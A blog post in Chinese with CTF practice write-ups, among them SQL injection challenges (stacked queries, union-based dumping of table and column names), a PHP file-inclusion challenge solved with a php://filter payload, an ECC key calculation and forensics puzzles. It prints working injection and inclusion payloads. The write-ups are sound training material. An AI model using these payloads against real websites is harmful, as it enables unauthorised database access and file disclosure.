CTF刷题05

[SUCTF 2019]EasySQL

访问题目地址
在这里插入图片描述
随便输入个123456,点击提交
在这里插入图片描述
输入*,什么也不返回
在这里插入图片描述
再输入' or '1'='1
在这里插入图片描述

尝试了很久没有头绪,看了一下大师傅们的wp,发现原来考查的是堆叠注入和命令执行,又get了新知识。

提交1;show databases;#
在这里插入图片描述
提交1;show tables; #,可以看到有一个Flag表
在这里插入图片描述
提交 1;select * from Flag;# ,出现Nonono
在这里插入图片描述

可以知道存在过滤,过滤了from,使用burpsuite进行fuzz,这些都被过滤了
在这里插入图片描述

运用命令执行中的||,就是前边的条件如果是错的,就执行后边的命令。可以使得select *,1||flag from Flag = select *,1 from Flag,这样就可以在from被过滤的情况下执行1;select * from Flag

提交*,1,得到flag
在这里插入图片描述

[ACTF2020 新生赛]Include

进入靶机地址,点击Tips
在这里插入图片描述

出现这个页面,给出了flag.php
在这里插入图片描述
尝试伪协议

传入 php://input,发现过滤了input。
在这里插入图片描述
再试试php://filter伪协议进行文件包含,加上read=convert.base64-encode来对文件内容进行编码

Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64编码后的flag.php文件源码:
在这里插入图片描述
Base64解密
在这里插入图片描述

[BugKu] 成绩单

访问题目地址
在这里插入图片描述
输入1,2,3分别能查到1,2,3号学生的成绩
在这里插入图片描述
输入1’无反应,输入1’#返回龙龙的成绩单,是字符型注入
在这里插入图片描述
判断列数,当提交 id=1' order by 5#时,没有正常回显,所以列数为4。
在这里插入图片描述
尝试联合查询,测试字段显示的顺序以及那些会回显

id=-1' union select 1,2,3,4#

在这里插入图片描述
爆当前库名,发现数据库名为skctf_flag

Payload: id=-1' union select 1,version(),user(),database()#

在这里插入图片描述
爆当前库里的表名,看到一个fl4g的表

Payload: id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述
爆当的表里的字段名,字段码为skctf_flag

Payload: id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

在这里插入图片描述

爆值,得到flag

Payload: id=-1' union select 1,2,3,skctf_flag from fl4g#

在这里插入图片描述

https://www.cnblogs.com/0yst3r-2046/p/10756453.html
https://blog.csdn.net/xuchen16/article/details/82785371

easy_ECC

题目描述:转眼两个人又走到了下一个谜题的地方,这又是一种经典的密码学加密方式 而你刚好没有这个的工具,你对小鱼说“小鱼我知道数学真的很重要了,有了工具只是方便我们使用 懂了原理才能做到,小鱼你教我一下这个缇努怎么做吧!”在小鱼的一步步带领下,你终于明白了ECC 的基本原理,成功的解开了这个题目,两个人相视一笑,快步走向了下一个题目所在的位置。flag格式为cyberpeace{x+y的值}

下载附件,附件中内容为

已知椭圆曲线加密Ep(a,b)参数为

p = 15424654874903

a = 16546484

b = 4548674875

G(6478678675,5636379357093)

私钥为

k = 546768

求公钥K(x,y)

下载椭圆曲线密码学工具ECCTOOL来解密

填入p、a、b、Gx、Gy和k的值,然后点击CALC R
在这里插入图片描述
可得到

x=13957031351290
y=5520194834100

x+y即为flag
19477226185390

FLAG

下载附件,进行异或,在使用Extract Preview进行分析,当red、green、blue通道全为0时,出现了PK文件头,点击Save Bin保存为压缩包
在这里插入图片描述
解压,发现文件损坏解压不了,用7z提取文件

在这里插入图片描述
看了wp才知道是elf文件,用IDA打开即可获得flag,又get到了

在这里插入图片描述

面具下的flag

下载附件,解压得到jpg图片

使用foremost分离,执行foremost mianju.jpg,得到一个压缩包
在这里插入图片描述
打开文件,发现需要密码
在这里插入图片描述
用winhex打开,发现是伪加密,09改为00,然后保存
在这里插入图片描述
解压,得到flag.vmdk文件,使用7z提取文件,得到两个文件
在这里插入图片描述
key_part_one文件中的内容为
在这里插入图片描述
解码
在这里插入图片描述

打开key_part_two文件,说flag不在这
在这里插入图片描述
百度一下,发现

windows下解压不会有<where_is_flag_part_two.txt:flag_part_two_is_here.txt这个文件
只有linux用命令解压才会有

复制到kali中解压

7z x flag.vmdk -o./

在这里插入图片描述

找到了key_part_two中的隐藏文件
在这里插入图片描述
解码
在这里插入图片描述

拼接起来就是flag

posted @ 2020-11-08 17:59  atkx  阅读(251)  评论(0编辑  收藏  举报